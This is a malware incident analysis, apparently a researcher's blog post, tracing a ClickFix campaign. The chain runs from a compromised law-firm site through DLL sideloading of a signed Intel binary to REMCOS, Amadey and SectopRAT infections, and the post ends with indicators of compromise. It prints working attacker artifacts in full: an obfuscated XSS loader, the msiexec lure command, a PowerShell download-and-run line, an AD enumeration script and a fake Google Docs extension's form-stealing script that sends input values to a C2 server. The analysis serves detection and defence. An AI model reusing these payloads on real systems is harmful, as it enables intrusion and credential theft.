Intel Reconfig Manager Exploited via DLL Sideloading
Intel Reconfig Manager Exploited via DLL Sideloading
ClickFix Attack Chain
This incident began with ClickFix (Like they all do these days).
The domain mnnursinghomelaw[.]com was compromised and serving a standard ClickFix lure.
The injected code used Reflected XSS to load the ClickFix page.
<script id="A9TNB8" src="https://accounts.google.com/o/oauth2/revoke?callback=Function(atob(%27CiAgICBsZXQgYkFib3J0ID0gZmFsc2U7CiAgICBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdtb3VzZW1vdmUnLCAoZSkgPT4gewogICAgICAgIGlmKGJBYm9ydCkgcmV0dXJuOwogICAgICAgIChmdW5jdGlvbiAoZCwgdywgbywgdSwgbiwgcykgeyAgIC8vY29uc29sZS5sb2coJ2dzdicsIGdzdik7IGNvbnNvbGUubG9nKCd2ZXJtJywgdmVybSk7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coJ2dzdiA9ICcsIGdzdik7CiAgICAgICAgICAgIGlmICghc2Vzc2lvblN0b3JhZ2VbImdzX2xvIl0gfHwgc2Vzc2lvblN0b3JhZ2VbIl9fc3luY19sb2FkIl0gPT09ICJvbmNlIikgcmV0dXJuOwogICAgICAgICAgICBjb25zdCBzdHlsZSA9IGQuY3JlYXRlRWxlbWVudCgic3R5bGUiKTsKICAgICAgICAgICAgc3R5bGUudGV4dENvbnRlbnQgPSAiQGtleWZyYW1lcyBmYWRlSW57ZnJvbXtvcGFjaXR5OjB9dG97b3BhY2l0eToxfX1ib2R5e29wYWNpdHk6MDthbmltYXRpb246MXMgZWFzZS1pbi1vdXQgMXMgZm9yd2FyZHMgZmFkZUlufSI7CiAgICAgICAgICAgIGQuaGVhZC5hcHBlbmRDaGlsZChzdHlsZSk7CiAgICAgICAgICAgIHZhciBkYXRhID0geyBob3N0OiBkLmxvY2F0aW9uLmhvc3QsIG5vdzogRGF0ZS5ub3coKSB9OwogICAgICAgICAgICBzID0gZC5jcmVhdGVFbGVtZW50KG8pOwogICAgICAgICAgICBzLmFzeW5jID0gMTsgcy5zcmMgPSB1ICsgIj9kYXRhPSIgKyBlbmNvZGVVUklDb21wb25lbnQoSlNPTi5zdHJpbmdpZnkoZGF0YSkpOwogICAgICAgICAgICBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQocyk7CiAgICAgICAgfSkoZG9jdW1lbnQsIHdpbmRvdywgInNjcmlwdCIsIGF0b2IoImFIUjBjSE02THk5c2FYTjBMbTFsZEdGdFpYUnlhV056TG01bGRDOCIpICsgYXRvYigiWjJWdmRHUjJNbWx1YzNSaGJuUXVjR2h3IikpOwogICAgICAgIGxldCBlbFMgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQTlUTkI4Iik7CiAgICAgICAgZWxTICYmIChlbFMucmVtb3ZlKCkpOwogICAgfSwgeyBvbmNlOiB0cnVlIH0pOwo%27))"></script>
The response from accounts.google.com/o/oauth2/revoke lists the function as the first item, which causes the <script> tag to parse and execute it.
// API callback
Function(atob('CiA...Owo'))({
"error": {
"code": 400,
"message": "Invalid JSONP callback name: 'Function(atob('CiA...Owo'))'; only alphabet, number, '_', '$', '.', '[' and ']' are allowed.",
"status": "INVALID_ARGUMENT"
}
});
This script decodes to an event listener that looks for a mousemove event. When detected, it decodes a URL and pulls the ClickFix lure.
let bAbort = false;
document.addEventListener('mousemove', (e) => {
if(bAbort) return;
(function (d, w, o, u, n, s) { //console.log('gsv', gsv); console.log('verm', verm);
//console.log('gsv = ', gsv);
if (!sessionStorage["gs_lo"] || sessionStorage["__sync_load"] === "once") return;
const style = d.createElement("style");
style.textContent = "@keyframes fadeIn{from{opacity:0}to{opacity:1}}body{opacity:0;animation:1s ease-in-out 1s forwards fadeIn}";
d.head.appendChild(style);
var data = { host: d.location.host, now: Date.now() };
s = d.createElement(o);
s.async = 1; s.src = u + "?data=" + encodeURIComponent(JSON.stringify(data));
document.documentElement.appendChild(s);
})(document, window, "script", atob("aHR0cHM6Ly9saXN0Lm1ldGFtZXRyaWNzLm5ldC8") + atob("Z2VvdGR2Mmluc3RhbnQucGhw"));
let elS = document.getElementById("A14SOI6");
elS && (elS.remove());
}, { once: true });
I won’t include the lure code, because it isn’t super interesting. A standard lure. It copies an MSI installation command to the user’s clipboard.
MSiExec.exE -PaCkAGe http:\\cfmn.us.com/compile/..\debug/..\UserID48763298 /q
This MSI unpacks the intel-reconfig.exe binary and DLLs and executes them.
DLL Hijacking and Side-Loading
DLL Loading Chain
intel-reconfig.exeloads legitimate signed DLLs that importxerces-c_3_2.dllxerces-c_3_2.dllcallsget_device()fromfltSc.dllfltSca.dllcallsTrainblock()andactivity()fromsichbopvr.dllsichbopvr.dllloads and executes a RAT (Likely REMCOS - LevelBlue)Trainblock()allocates the payloadactivity()executes it
fltSca.dllloadsBoot.dllBoot.dllcontains additional C2 and enumeration capabilities
Summary
The intel-reconfig.exe binary is a legitimate, signed, binary from Intel. It’s bundled with several Intel-signed DLLs as well. One of these DLLs, ccl_msg.dll, loads an Apache DLL used for XML processing and operations. This dll, xerces-c_3_2.dll, has been targeted by the threat actor for abuse via DLL Hijacking.
xerces-c_3_2.dll contains all of the original content of the legitimate Apache DLL, but it additionally contains a tacked on segment calling fltSca.dll. This segment has been added to the end of the file content.
Because of the inclusion method, the IAT of the xerces-c_3_2.dll is bypassed. This causes it to fail to display correctly in IDA.
However, we can still see the import in a hex editor (like HxD), or through tools like PEStudio.
The get_device function in fltSca.dll loads Boot.dll and Voice.dat.
get_device finds Boot.dll and loads it via a call to LoadLibraryW.
The LoadLibraryW call can be seen in APIMonitor.
Voice.dat is also loaded in the same function.
After loading Boot.dll and processing Voice.dat, fltSca.dll calls Trainblock and activity from sichbopvr.dll. This is consistent with the activity oberseved by LevelBlue in their recent post on REMCOS RAT. Specifically, the process of utilizing VirtualProtect and EnumSystemCodePagesW for shellcode execution. In the incident observed by LevelBlue, the general loading process is exactly the same as the loader observed in fltSca.dll and sichbopvr.dll.
-
Voice.Dat load in
fltSca.dll
-
fltSca.dllcalls Trainblock()
-
sichbopvr.dllallocating the shellcode inTrainblockand executing it inactivity
This activity can be confirmed in APIMonitor as well.
Interestingly, Voice.dat is a GARBro DB file. It’s a ZLib compressed file format. Drop the header, inflate it, and use an MS-NRBF parser to deserialize it. I used nrbf-parser.
The shellcode was simply inserted into the file at offset 1153021 (the offset that decompression fails at).
Boot.dll Capabilities
Broken down into explicit functions, Boot.dll contains the ability to:
-
Enumerate RDP sessions via
WTSEnumerateSessionsW
-
Take screenshots via
BitBlt
-
Network communications (Including Beaconing)
-
Window enumeration with
GetDesktopWindowandGetTopWindow
-
(Likely) Reflective Loading
memcpyto move the data,VirtualProtectto make it executable,CreateThreadfor execution
Incident
For the actual compromise chain, I will include information from two observed incidents. The first incident was on an enterprise device. The second was in a controlled sandbox environment.
Incident A [Enterprise - Domain Joined]
Timeline
07:54 User Visits Compromised Domain
`www[.]mnnursinghomelaw[.]com` - Compromised Domain
`list[.]metametrics[.]com` - ClickFix loader
07:55 User Executed ClickFix Command
`MSiExec.exE -PaCkAGe hxxp[:\\]cfmn[.]us[.]com/compile/..\debug/..\UserID48763298 /q`
07:58 User Device Connects to C2
`193.202.84.17`
8:00 A Run key is created
`HKU\Software\Microsoft\Windows\CurrentVersion\Run Intel Reconfig Manager <..>\AppData\Local\Programs\Intel Reconfig Manager\intel-reconfig.exe`
08:00 A Staging Directory is Created
`<..>\AppData\Local\UiInterface`
08:12 A Scheduled Task is Created
`Intel Reconfig Manager <..>\AppData\Local\Programs\Intel Reconfig Manager\intel-reconfig.exe`
09:56 Device Domain Queried
`dsregcmd /status | findstr "DomainJoined WorkplaceTenantName Executing"`
10:10 Active Directory Enumeration
11:56 Binary File Written to Staging Directory
`<..>\AppData\Local\UiInterface\minterface.bin`
During this incident, two commands were observed executed on the compromised device. The first command was used to return the domain status of the device. Once confirming the device was domain joined, the threat actor ran a PowerShell script to enumerate the servers joined to the domain.
Notably, this script was first observed in use by Iranian Actors in 2024.
$i=0
$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$L='LDAP://'.$D
$D = [ADSI]$L
$Date = $((Get-Date).AddDays(-90).ToFileTime())
$str = '(&(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))'
$s = [adsisearcher]$str
$s.searchRoot = $L.$D.distinguishedName
$s.PropertiesToLoad.Add('cn') > $Null
$s.PropertiesToLoad.Add('operatingsystem') > $Null
$s.PropertiesToLoad.Add('description') > $Null
$s.PropertiesToLoad.Add('distinguishedName') > $Null
Foreach ($CA in $s.FindAll()){
Write-Host $CA.Properties.Item('cn')
$CA.Properties.Item('operatingsystem')
$CA.Properties.Item('description')
$CA.Properties.Item('distinguishedName')
$i++
}
Write-host Total servers: $i
The device was contained shortly after, and further behavior was not observed.
Incident B [Sandbox]
Timeline
13:48 intel-reconfig.exe executed
13:48 Boot.dll loaded
`fltSca.dll LoadLibraryW ( "C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\Boot.dll" )`
13:50 Google DoH Query
13:50 C2 Connection
`193.202.84.17`
13:50 intel-reconfig.exe Terminated
`Initial Analysis to capture base indicators`
...
15:29 intel-reconfig.exe executed
15:29 Boot.dll Loaded
`fltSca.dll LoadLibraryW ( "C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\Boot.dll" )`
15:30 Google DoH Query
`webio.dll RtlCompareUnicodeStrings ( "dns.google", 10, "dns.google/dns-query", 10, TRUE )`
15:30 C2 Connection
`193.202.84.17`
15:32 Registry Run Key Set
`TargetObject: HKU\..\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Intel Reconfig Manager C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\intel-reconfig.exe`
15:44 Task Created
`TargetFilename: C:\Windows\System32\Tasks\Intel Reconfig Manager`
16:22 PowerShell Spawned from intel-recofig.exe
`CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NoExit -Command "$OutputEncoding=[Console]::OutputEncoding=[Console]::InputEncoding=[System.Text.UTF8Encoding]::UTF8"`
16:26 PowerShell Script Execution
`Invoke-WebRequest -Uri 'hxxp[:\\]cfmn[.]us[.]com/Data.zip' -OutFile 'C:\programdata\bootstrap.zip'; Expand-Archive -Path 'C:\programdata\bootstrap.zip' -DestinationPath 'c:\programdata\InfoAggregator' -Force; Remove-Item 'c:\programdata\bootstrap.zip'; cmd /c 'c:\programdata\InfoAggregator\InfoAggregator.exe';`
16:27 InfoAggregator.exe Executed
`c:\programdata\InfoAggregator\InfoAggregator.exe`
16:27 InfoAggregator.exe Files Moved
`TargetFilename: C:\ProgramData\com_int_thread_v7_dbg\InfoAggregator.exe`
16:27 InfoAggregator.exe Executed
`CommandLine: C:\ProgramData\com_int_thread_v7_dbg\InfoAggregator.exe`
16:27 XPFix.exe Dropped
`TargetFilename: C:\Users\Admin\AppData\Roaming\com_int_thread_v7_dbg\XPFix.exe`
16:28 XPFix.exe Executed
`CommandLine: "C:\Users\Admin\AppData\Roaming\com_int_thread_v7_dbg\XPFix.exe" "C:\Users\Admin\AppData\Roaming\com_int_thread_v7_dbg\XPFix.exe" /u`
16:28 Fake Google Doc Extension Dropped
`C:\Users\Admin\AppData\Local\nimdA\llg`
16:28 XDock86.exe Dropped
`Image: C:\ProgramData\com_int_thread_v7_dbg\InfoAggregator.exe TargetFilename: C:\Users\Admin\AppData\Local\XDock86.exe`
16:28 XDock86.exe Execution
`CommandLine: C:\Users\Admin\AppData\Local\XDock86.exe`
16:28 XDock86.exe Network Connection
`150.241.81.137`
16:28 XDock86 Browser Hijacking
`SourceImage: C:\Users\Admin\AppData\Local\XDock86.exe TargetImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
16:28 Hijacked Edge Process
'ParentCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\r1iramwh.3ee"`
This incident is the result of manual analysis in a controlled sandbox envinronment. Execution was primarily monitored through APIMonitor, Sysmon, and WireShark. The intel-reconfig.exe binary was executed once for intial indicator gathering and testing, and once for long-term monitoring of threat actor activities.
DLL Loading Chain
intel-reconfig.exeloads legitimate signed DLLs that importxerces-c_3_2.dllxerces-c_3_2.dllcallsget_device()fromfltSc.dllfltSca.dllcallsTrainblock()andactivity()fromsichbopvr.dllsichbopvr.dllloads and executes a RAT (Likely REMCOS - LevelBlue)Trainblock()allocates the payloadactivity()executes it
fltSca.dllloadsBoot.dllBoot.dllcontains additional C2 and enumeration capabilities
While not confirmed, it is likely that the sample utilizes Google DoH to retrieve the IPv4 of the C2 server. A quick test shows that carrotbunnies.com resolves to 192[.]202[.]84[.]17, the first C2 address.
After contacting the C2, a Run key and Scheduled Task were created.
The task contents are:
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Author>Admin</Author>
<URI>\Intel Reconfig Manager</URI>
<SecurityDescriptor>D:(A;;FA;;;WD)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<LogonTrigger id="10789407">
<Enabled>true</Enabled>
<UserId>DESKTOP-R30J1LQ\Admin</UserId>
<Delay>PT03S</Delay>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id="10795294">
<RunLevel>LeastPrivilege</RunLevel>
<UserId>DESKTOP-R30J1LQ\Admin</UserId>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="10795294">
<Exec>
<Command>C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\intel-reconfig.exe</Command>
</Exec>
</Actions>
</Task>
Approximately an hour after execution, the threat actor began staging files on the device. This behavior started with PowerShell execution that pulled bootstrap.zip from the actor-controlled domain, cfmn[.]us[.]com.
Invoke-WebRequest -Uri 'hxxp[:\\]cfmn[.]us[.]com/Data.zip' -OutFile 'C:\programdata\bootstrap.zip'; Expand-Archive -Path 'C:\programdata\bootstrap.zip' -DestinationPath 'c:\programdata\InfoAggregator' -Force; Remove-Item 'c:\programdata\bootstrap.zip'; cmd /c 'c:\programdata\InfoAggregator\InfoAggregator.exe';
The InfoAggregator.exe payload retrieved from this archive is an Amadey payload that is well documented.
After the Amadey payload was executed, XPFix.exe was dropped and executed. This payload is from the 360 Security Guard (360安全卫士) tool from 360.cn. 360 Security Guard offers multiple products, including Endpoint Security tools.
This tool may have been utilized in an attempt to remove or disable other security tools that may have been installed on the system. The process was terminated immediately after starting and did not appear to have any network communctions, artifacts dropped, or other indications of malicious use.
The Amadey payload was also used to drop XDock86.exe.
XDock86.exe is a Paragon Software system utility originally named rmb_pnpenforce. Paragon Software creates forensics, data management, backup, and other tools.
The XDock86.exe payload was utilized to deploy a malicious Microsoft Edge profile for Browser Hijacking. Additionally, it made a significant number of requests to 150[.]241[.]81[.]137 over 443 and 9000.
These requests highly match indicators associated with SectopRAT (Trend Micro).
GET /wbinjget?q=A1EB3078895AFDB699B5D38AA576E57E HTTP/1.1
Host: 150.241.81.137:9000
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
Access-Control-Allow-Headers: *
Access-Control-Expose-Headers:
Accept: */*
Accept-Language: en-US, en
Accept-Charset: ISO-8859-1, utf-8
Host: *:9000
Date: Wed, 08 Apr 2026 23:08:53 GMT
Connection: close
Additionally, the edge browser hijacking via malicious browser profile is behavior documented in many SectopRAT (AKA ArechClient2) incidents.
A fake Google Docs extension was also written and utilized for browser credential theft.
{
"manifest_version": 3,
"name": "Google Docs",
"description": "Edit, create, and view your documents, spreadsheets, and presentations — all without internet access.",
"version": "1.7.38",
"icons": {
"16": "icon.png",
"48": "icon.png",
"128": "icon.png"
},
"permissions": [
"activeTab",
"storage",
"scripting"
],
"host_permissions": [
"<all_urls>"
],
"content_scripts": [
{
"all_frames": true,
"js": ["jquery.js", "content.js"],
"matches": ["<all_urls>"]
}
],
"background": {
"service_worker": "background.js"
},
"action": {
"default_title": "SFASFASD"
}
}
content.js is a
var server = "http://150.241.81.137:9000/";
var iddd = 'A1EB3078895AFDB699B5D38AA576E57E';
var debug = 1;
var currLoc = "";
(async function () {
var clientId = iddd;
urlChangeAllert();
spyjs_refreshEvents(clientId);
})()
function urlChangeAllert(){
try{
var loc = window.location;
getNoRet(server+'churl?pcid='+iddd+"&url="+loc);
}catch(error){ }
}
function spyjs_refreshEvents(clid){
if(currLoc != location.href){
currLoc=location.href;
spyjs_saveData("("+currLoc+")");
}
$('input').unbind('change');
$('input').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('select').unbind('change');
$('select').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('checkbox').unbind('change');
$('checkbox').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('button').unbind('change');
$('button').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('textarea').unbind('change');
$('textarea').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
}
function spyjs_getInput(inputInfo, clid){
var name = inputInfo.name;
var value = inputInfo.value;
var stolenInput = {};
if(name === ""){
name="undefined_input";
}
if(value != ""){
stolenInput[name] = value;
var base = currLoc;
getNoRet(server+'fsave?name='+name+"&value="+value + "&sites=" +base + "&clid=" + clid);
}
}
function spyjs_saveData(data){
};
function get(urll){
var ret;
return new Promise(async send => {
chrome.runtime.sendMessage({message: "get", url: urll}, (response) => {
//onsole.log(response);
send(response);
});
});
}
function getNoRet(urll){
new Promise(async send => {
chrome.runtime.sendMessage({message: "get", url: urll}, (response) => {
send(response);
//console.log(response);
});
});
}
Unfortunately, I didn’t get a good capture of the XDock86.exe execution. It appears that the Amadey payload is creating it in a suspended state, possibly for injection or hollowing.
XDock86.exe is directly using NtDeviceIoControlFile to interact with \Device\Afd. This is what Winsock is built on. We can confirm the connection by looking at IOCTL_AFD_SET_CONTEXT, IOCTL_AFD_BIND, and IOCTL_AFD_CONNECT.
If we examine the IOCTL_AFD_BIND call, we can extract the IP address from the input buffer.
Notes
I did leave the payloads running on my sandbox for a couple days after the initial analysis. Nothing happened past the edge profile launch.
Additionally, there were a lot of payloads and processes to this incident. I tried to at least cover everything, but I didn’t go in-depth on the initial (likely) REMCOS RAT or the Amadey loader. Some of the DLLs could also benefit from further analysis.
Indicators
| Indicator | Type | Description |
|---|---|---|
| mnnursinghomelaw[.]com | Domain | Compromised domain |
| list[.]metametrics[.]com | Domain | ClickFix lure |
| cfmn[.]us[.]com | Domain | Payload delivery |
| 193[.]202[.]84[.]17 | IPv4 | C2 |
| 150[.]241[.]81[.]137 | IPv4 | C2 |
| 97ACEF1702383364DE256D69F9672AC7A1E2A450BFB3819649A18246B4ECD679 | SHA256 | UserID48763298.msi - ClickFix payload |
| 16E2580E18E60037C7B139FF29085841C3110EFEC44A9F948450E8A0AC65DEB7 | SHA256 | intel-reconfig.exe - Legitimate Intel binary |
| CFDAB2693D867FBC5FB2B072BC972520CD76D20827002A9BEFD6DCC170504582 | SHA256 | xerces-c_3_2.dll - Hijacked DLL |
| BA21A8B70069292DA39F294B9B60AC90FF6179325F9015C99C2779BBD27B4EF5 | SHA256 | fltSca.dll - Orchestrator |
| 9AA1DAF56FFFF27888BD49742FFDDDF35003F3146F12A2FE22F57C86E60A792E | SHA256 | sichbopvr.dll - RAT Loader |
| E59404B9A360EDDA7EC13F291FF569135BA1B422AA8C9C6FDD5C3AD4991DB39C | SHA256 | Boot.dll - Backdoor |
| EC4C0A87EC82E97E0D6D32E6C5E78B472BF203861FFF5052E4B1AE2ED14B48DE | SHA256 | InfoAggregator.exe - Amadey |
| 5EC174AF8A18A5516B8A6E11D8A27481D70DF14D1EDB67C48B5458FF44DF9146 | SHA256 | XPFix.exe - Qihoo 360 Security Guard Protection Center Module |
| EE986C1CEF147252D59D2E5BAC4FAA902B121B54CBD576C8CFAF0DEE58B1F6BE | SHA256 | XDock86.exe - Paragon Software Utility |
| FFCECC52E4739BE7867C5FED4C4C594041896C205992E1A99A375E87F8D1CC30 | SHA256 | content.js - Browser credential harvester |